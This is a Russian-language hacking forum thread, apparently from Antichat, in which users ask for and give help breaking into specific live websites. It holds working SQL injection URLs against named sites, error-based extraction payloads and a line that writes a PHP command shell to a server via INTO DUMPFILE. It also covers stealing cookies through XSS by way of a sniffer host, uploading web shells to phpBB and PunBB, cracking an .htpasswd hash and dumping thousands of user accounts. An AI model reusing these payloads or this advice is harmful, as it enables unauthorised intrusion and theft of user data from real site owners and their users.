Не могу найти админку: http://www.ehealth2008.si/index.php

Сканер только это нашел:

http://www.ehealth2008.si/images/ HTTP 200 OK
http://www.ehealth2008.si/src/ HTTP 200 OK
http://www.ehealth2008.si/stats/ HTTP 401 Authorization Required
http://www.ehealth2008.si/server-status/ HTTP 403 Forbidden
http://www.ehealth2008.si/about.php HTTP 200 OK
http://www.ehealth2008.si/icons/ HTTP 200 OK
http://www.ehealth2008.si/index.php HTTP 200 OK
http://www.ehealth2008.si/src/ HTTP 200 OK
http://www.ehealth2008.si/style.css HTTP 200 OK
http://www.ehealth2008.si/cgi-bin/ HTTP 403 Forbidden

Помогите, плиз.
почти уверен что тут админки нету,скорее всего сайт админится через фтп!

http://www.prodisney.ru/index.php?page=GPI

все вроде отлично, но не пойму одного: почему при ссылке на мой шелл с народа браузер предлагает скачать shell.php?

пробовал менять расширение шелла на txt, теперь на старницу выводиться тект шелла(необработанный пхп)

http://www.prodisney.ru/index.php?page=GPI

все вроде отлично, но не пойму одного: почему при ссылке на мой шелл с народа браузер предлагает скачать shell.php?

пробовал менять расширение шелла на txt, теперь на старницу выводиться тект шелла(необработанный пхп)

здесь нету RFI

здесь нету RFI
http://www.prodisney.ru/index.php?page=http://google.ru/index.php

Там фреймы

не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это

Unable to upload file

DEBUG MODE

Line : 251
File : usercp_avatar.php

Что посоветуете?

помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?

не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это

Unable to upload file

DEBUG MODE

Line : 251
File : usercp_avatar.php

Что посоветуете?

а какие остальные? В подпись eval пробовал совать? Есть вопросы - PM

PS: решено)

помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?

http://school145.edu.kh.ua/livesearch/search/query/?value="><script>alert()</script>
вместо "><script>alert()</script> скрипт сниффера(например sniffer.xaknet.ru)

Ну что же друзья, может это будет и оффтоп , но решилась не одна проблема по заливке шелла на форум пхпбб, много форумов у которых не срабатывал ни один общеизветсный способ заливки кода ,сегодня стали достоянием моего списка с шеллами. И все благодаря способу который Pashkela описал тут link (https://forum.antichat.net/thread191917.html) .Всем рекомендую.

вообщем такая проблемка,есть linux (debian) 2.6.18. залил шелл wso2,биндпорт,бэкконнект
не проходит... при вводе which gcc ничего не показует, хотя на вкладке шелла [sec. info] явно показует (gcc version 4.1.2 20061115 (prerelease)... как быть дальше? может попробовать скомпилированый сплоит под это ядро? вот только где взять компилированый? wget присутствует...
P.S. Я так понимаю что если выход в инет осуществляется через VPN сервер то бэкконект и биндпорт непроканает?...

вообщем такая проблемка,есть linux (debian) 2.6.18. залил шелл wso2,биндпорт,бэкконнект
не проходит... при вводе which gcc ничего не показует, хотя на вкладке шелла [sec. info] явно показует (gcc version 4.1.2 20061115 (prerelease)... как быть дальше? может попробовать скомпилированый сплоит под это ядро? вот только где взять компилированый? wget присутствует...
P.S. Я так понимаю что если выход в инет осуществляется через VPN сервер то бэкконект и биндпорт непроканает?...
SAFE MODE: ?

SAFE MODE OFF

как инъекцию раскрутить если фильтруются скобки, то есть к примеру @@version проходит, а version() нет ?

как инъекцию раскрутить если фильтруются скобки, то есть к примеру @@version проходит, а version() нет ?

писать запросы без скобок

union+select+1,2,table_name+from+information_schem a.tables

ни одной скобки, уау

PS: Без юзера и прочих параметров как-нибудь можно пережить трагедию

понять немогу такое может быть что COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS идет а при INFORMATION_SCHEMA.TABLES выкидует сразу на 403 Forbidden !?!

(c limit'ом пробовал также с where+table_schema=0x..)

']понять немогу такое может быть что COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS идет а при INFORMATION_SCHEMA.TABLES выкидует сразу на 403 Forbidden !?!

(c limit'ом пробовал также с where+table_schema=0x..)


Mod_secutity или прочее.

А зачем тебе в tables лезть то? в columns - все что нужно.

where column_name like(0x70617373) or column_name like(0x61646d696e) or column_name like(0x75736572) ..........

вопрос по скуле) я в логине ввожу "логин пользователя' or 1=1 -- " мне выдало ошибку Ошибка разбора XML: синтаксическая ошибка (Строка: 11, Символ: 36)

Обработать документ как HTML
Ошибка:invalid start-tag

в ошибке выделена красным первая буква логина a

8: </head> 9: <card id="main" title="Lost Paradise"> 10: <p>&#x0412;&#x0430;&#x0448; &#x043f;&#x0435;&#x0440;&#x0441;&#x043e;&#x043d;&#x0430;&#x0436; &#x043f;&#x043e;&#x043a;&#x0438;&#x043d;&#x0443;&#x043b; &#x0438;&#x0433;&#x0440;&#x0443; &#x0438;&#x0437;-&#x0437;&#x0430; &#x0431;&#x0435;&#x0437;&#x0434;&#x0435;&#x0439;&#x0441;&#x0442;&#x0432;&#x0438;&#x044f; &#x0432; &#x0442;&#x0435;&#x0447;&#x0435;&#x043d;&#x0438;&#x0435; 4 &#x043c;&#x0438;&#x043d;&#x0443;&#x0442;. 11: <br/><a href="game.php?login=user.\"ambal\\\' or 1=1 -- \"&amp;p=&amp;r=6631&amp;p=&amp;site=connect2">&#x0412;&#x043e;&#x0439;&#x0442;&#x0438;</a> &#x0432; &#x0438;&#x0433;&#x0440;&#x0443; 12: <br/>---<br/><a href="game.php?sid=user.\"ambal\\\' or 1=1 -- \"&amp;p=&amp;r=6631&amp;r=4299">[&#x0412; &#x0438;&#x0433;&#x0440;&#x0443;]</a></p> 13: </card></wml>
из за чего?
просто xml я не знаю... подскажите кто-нибудь.

вопрос по скуле) я в логине ввожу "логин пользователя' or 1=1 -- " мне выдало ошибку Ошибка разбора XML: синтаксическая ошибка (Строка: 11, Символ: 36)

Обработать документ как HTML
Ошибка:invalid start-tag

в ошибке выделена красным первая буква логина a

8: </head> 9: <card id="main" title="Lost Paradise"> 10: <p>&#x0412;&#x0430;&#x0448; &#x043f;&#x0435;&#x0440;&#x0441;&#x043e;&#x043d;&#x0430;&#x0436; &#x043f;&#x043e;&#x043a;&#x0438;&#x043d;&#x0443;&#x043b; &#x0438;&#x0433;&#x0440;&#x0443; &#x0438;&#x0437;-&#x0437;&#x0430; &#x0431;&#x0435;&#x0437;&#x0434;&#x0435;&#x0439;&#x0441;&#x0442;&#x0432;&#x0438;&#x044f; &#x0432; &#x0442;&#x0435;&#x0447;&#x0435;&#x043d;&#x0438;&#x0435; 4 &#x043c;&#x0438;&#x043d;&#x0443;&#x0442;. 11: <br/><a href="game.php?login=user.\"ambal\\\' or 1=1 -- \"&amp;p=&amp;r=6631&amp;p=&amp;site=connect2">&#x0412;&#x043e;&#x0439;&#x0442;&#x0438;</a> &#x0432; &#x0438;&#x0433;&#x0440;&#x0443; 12: <br/>---<br/><a href="game.php?sid=user.\"ambal\\\' or 1=1 -- \"&amp;p=&amp;r=6631&amp;r=4299">[&#x0412; &#x0438;&#x0433;&#x0440;&#x0443;]</a></p> 13: </card></wml>
из за чего?
просто xml я не знаю... подскажите кто-нибудь.


скорей всего данные в браузер идут как xml, а там твой логин с кавычкой, который ты вводил - а в xml кавычку нужно в html-сущность переводить, иначе ошибка.
ambal\\\'
В общем, к скуле это имеет отдаленное отношение, плюс ко всему - там MQ on.

В общем не знаю там ли написал, но вот такой вот вопрос ребята. В некой БД как то странно время вычисляется в виде цифр, в колонке time к примеру 1269553831 или 1269554171 . Я так понимаю это какая то зашифрованная дата или цифра. Как расшифровать? И можно ли цифру преобразовать в такой код.

В общем не знаю там ли написал, но вот такой вот вопрос ребята. В некой БД как то странно время вычисляется в виде цифр, в колонке time к примеру 1269553831 или 1269554171 . Я так понимаю это какая то зашифрованная дата или цифра. Как расшифровать? И можно ли цифру преобразовать в такой код.
http://ru.wikipedia.org/wiki/UNIX-время

Огромнейшее спасибо. :)

Набираю в админке: 'or+5=5)--

выскакивает такая ошибка:

error executing query select id from trustee where name = ''or+5=5)-- ':
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')-- '' at line 1

Как тут правильно составить запрос?

Заранее всем спасибо!

Пробуй '+||+'1

Набираю в админке: 'or+5=5)--

выскакивает такая ошибка:

error executing query select id from trustee where name = ''or+5=5)-- ':
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')-- '' at line 1

Как тут правильно составить запрос?

Заранее всем спасибо!


не плюсы, а пробелы используй.

Не получается, вот админка попробуйте сами:

http://www.vierpfoten.org/redadmin

Не получается, вот админка попробуйте сами:

http://www.vierpfoten.org/redadmin


http://www.vierpfoten.org/website/output.php?id=1001%27+and+%28select*from%28select+ count%28*%29from%28select+1+union+select+2+union+s elect+3%29x+group+by%20concat%28mid%28%28select+ve rsion%28%29+from+INFORMATION_SCHEMA.TABLES+limit+0 ,1%29,1,33%29,floor%28rand%280%29*2%29%29%29z%29/*

Version: 5.0.22-Debian_0ubuntu
database: cmsVpOrgNe
ищи я уверен ты найдешь там что нужно ;)

http://www.vierpfoten.org/website/output.php?id=1001%27+and+%28select*from%28select+ count%28*%29from%28select+1+union+select+2+union+s elect+3%29x+group+by%20concat%28mid%28%28select+ta ble_name+from+INFORMATION_SCHEMA.TABLES+limit+0,1% 29,1,10%29,floor%28rand%280%29*2%29%29%29z%29/*

ребят помогите са скулом :( есть таблица phpbb_users

table_rows возвращает 4186 :)

а когда делаю запрос union+select+1,2+from+phpbb_users--
выдает ошибку :( help!!

ребят помогите са скулом :( есть таблица phpbb_users

table_rows возвращает 4186 :)

а когда делаю запрос union+select+1,2+from+phpbb_users--
выдает ошибку :( help!!
Ты пытаешься вывести колонки 1 и 2 , которые не существуют в таблице phpbb_users
Почитай внимательнее (https://forum.antichat.ru/thread43966.html)

Ты пытаешься вывести колонки 1 и 2 , которые не существуют в таблице phpbb_users
Почитай внимательнее (https://forum.antichat.ru/thread43966.html)

union+select+concat(username,char(58),user_passwor d,char(58),user_email,char(58),user_icq),2+from+ph pbb_users--

тоже возвращает ошибку :rolleyes:

union+select+concat_ws(0x3a,username,user_password ,user_email,user_icq),2+from+ph pbb_users--

union+select+concat_ws(0x3a,username,user_password ,user_email,user_icq),2+from+ph pbb_users--

Дело Не в Этом,просто не дает вывести инфу с таблицы ..а запрос правильный :rolleyes:

Konqi телепатов нет - какую ошибку выдает? Мейби с кодировкой что то не то и нужно например unhex(hex(, e.g.: union+select+unhex(hex(concat_ws(0x3a,username,use r_password ,user_email,user_icq))),2+from+ph pbb_users--

+union+select+1,2+from+information_schema.tables NORM

+union+select+1,2+from+phpbb_users ERROR

но знаю что таблица существует

table_rows возвращает 4186 ,значит таблица не пуста

Возможно что:
1)Проблемы с кодировкой, как можно решить описал.
2)Не достаточно грантов на phpbb_users.
3)phpbb_users нет.
4)Какая то хитрая гверя или скрипт выполняющий запрос что то меняет(мало вероятно).
5)ХЗ.

Konqi
Когда Вы научитесь читать что-то?

Даю 99% что таблица в другой базе, этот вопрос сдесь задавали раз 500

2)Не достаточно грантов на phpbb_users.
.
В мускуле нельзя разграничить права на таблицы, только базы

есть способы заливки шелла в PunBB 1.2.15 с правами админа ?
пробывал сплоент http://www.security.nnov.ru/files/punBB_spl.pl, не работает

ребят помогите са скулом :( есть таблица phpbb_users

table_rows возвращает 4186 :)

а когда делаю запрос union+select+1,2+from+phpbb_users--
выдает ошибку :( help!!


from+phpbb_users where table_schema='база с таблицой phpbb_users'

Cначало
select table_schema from information_schema.tables where table_name='phpbb_users'
Выдаёт базу.Потом:
select username,user_password from база.phpbb_users

http://www.nzp.co.nz/company.php?pg=79/**/order/**/by/**/4/*

помогите раскрутить скуль
Как я понял выводится только через ошибку

http://www.nzp.co.nz/company.php?pg=79/**/order/**/by/**/4/*

помогите раскрутить скуль
Как я понял выводится только через ошибку

http://www.nzp.co.nz/company.php?pg=79+and+substring(version(),1,1)=3

Третья ветка MySQL, про особенности проведения инъекций здеcь можно подробнее прочитать например тут: https://forum.antichat.ru/showpost.php?p=565034&postcount=4

наткнулся на непонятку:
на сайте есть админка - site/admin/
через sql inj с load_file вытянул [user()=root@localhost]

admin/.htaccess
=>
AuthType Basic
AuthName "bla bla"
AuthUserFile /Users/serveradmin/Documents/.htpasswd
Require user serveradmin

файл /Users/serveradmin/Documents/.htpasswd через sql inj не тянется, вполне возможно его и нет.
есть файл
admin/.htpasswd
=>
admin:t0oQM1tD4/ytw [=> nh84mk]
jamie:OWkrWXnR/Sr46

но через admin/nh84mk авторизация не проходит.
вопрос 1 - там соль (вроде соль же в .htpasswd не используется ?)
или у меня не хватает прав прочесть /Users/serveradmin/Documents/.htpasswd ?
или что-то еще ?

доп инфа:

/etc/passwd
=>
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
_mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
...

есть pureftpd.pdb, но как оттуда вытянуть пароли я не нашел

вопрос 2: если включено экранирование кавычек то into outfile или его вариантом воспользоваться нельзя ?

сайтом могу за помощь поделиться - я на нем просто тренируюсь :) там ничего интересного нет, кроме самой возможности заиметь дедик :)

вопрос 1 - там соль (вроде соль же в .htpasswd не используется ?)

Нету там никакой соли. просто авторизация проходит по /Users/serveradmin/Documents/.htpasswd(на который нет прав для чтения мускулу), а не по admin/.htpasswd
вопрос 2: если включено экранирование кавычек то into outfile или его вариантом воспользоваться нельзя ?
Если скуль двойная(что это? (https://forum.antichat.ru/showpost.php?p=663815&postcount=31)) - то можно, в обычном случае нельзя.

Нету там никакой соли
Первые два символа DES-хэша и есть соль.

<?php
echo crypt ('nh84mk', 't0'), "\n";
?>


t0oQM1tD4/ytw

Интересно, сколько этот пост проживет? )

Ребята, нашел sql inj на сайте и ничего с ней не получается.
Вот сайт http://www.warsong.ws/exchange/?s=send

' AND NULL UNION SELECT 'email@mail.com',1#
Где 1 - id юзера, email@mail.com - твой мейл.

На него придет ссылка с подтверждением смены пароля для указаного id.

phpBB 2.0.21 как залить шел с админки??

кидай в личку, подмогу чем смогу

Такие вопросы
1)
Могу ли я сделать два условия сразу т.е.:

union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_ lastlog,)%20from%20members%20where%20M_country='US A' and M_gender='M' limit+0,1%20--

т.е. мне нужны только мужики и америкосы. Правельно ли я реализовал запрос? Если нет то как можно реализовать такую задачу

2)
При таком запросе без лимита выводится первый в списке, а мне нужно слить 8000 акков что при таком раскладе будет слегка затруднительно)

union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_ lastlog,)%20from%20members%20where%20M_country='US A' and M_gender='M'

Пробывал делать так (выводится ошибка о не верном типе данных) :
union%20select%20group_concat(M_uname,0x3a,M_dob,0 x3a,M_lastlog,)%20from%20members%20where%20M_count ry='USA' and M_gender='M'

(Ногами не пинать. Новичок.)

Такие вопросы
1)
Могу ли я сделать два условия сразу т.е.:

union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_ lastlog,)%20from%20members%20where%20M_country='US A' and M_gender='M' limit+0,1%20--

т.е. мне нужны только мужики и америкосы. Правельно ли я реализовал запрос? Если нет то как можно реализовать такую задачу

2)
При таком запросе без лимита выводится первый в списке, а мне нужно слить 8000 акков что при таком раскладе будет слегка затруднительно)

union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_ lastlog,)%20from%20members%20where%20M_country='US A' and M_gender='M'

Пробывал делать так (выводится ошибка о не верном типе данных) :
union%20select%20group_concat(M_uname,0x3a,M_dob,0 x3a,M_lastlog,)%20from%20members%20where%20M_count ry='USA' and M_gender='M'

(Ногами не пинать. Новичок.)

Подучи хоть немного синтаксис sql и подобные вопросы отпадут

Нашел самую обыкновенную sql inj и никак не могу составить грамотно запрос. Помогите найти решение.
http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='

http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+and+substring(version(),1,1)=5--+
version():
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat(version(),floor(rand(0)* 2)))--+

спасибо все получилось

поjaлуста помоqите заливать шелл

http://www.fytobell.be/newsitem_show.php?item=-120+union+select+0,0x3C3F696E636C75646528245F47455 45B22636D64225D293B3F3E,2,3,4,5,6,7,8,9+from+mysql .user+INTO+DUMPFILE+%27E:\Inetpub\www.ort-systeem.be\web\mmtools\impuls\sites\fytows\test13. php%27

Подскажите как отсюда вывести table_name из базы information_schema.tables ?
http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='

Подскажите как отсюда вывести table_name из базы information_schema.tables ?
http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='

http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10%27+or+%28select+count%28*%29+from+informat ion_schema.tables+group+by+concat%28table_name,flo or%28rand%280%29*%202%29%29%29--+

нубство

не выводит

не выводит
Ну просто ппц... реал нубство ты вообще на код смотришь иле тока нажимаешь strg+c и в url strg+v ??

конечно смотрю! но я не могу получить конкретное значение !

Ну так ты пробелы убери, фильтрация от 1-8 класса.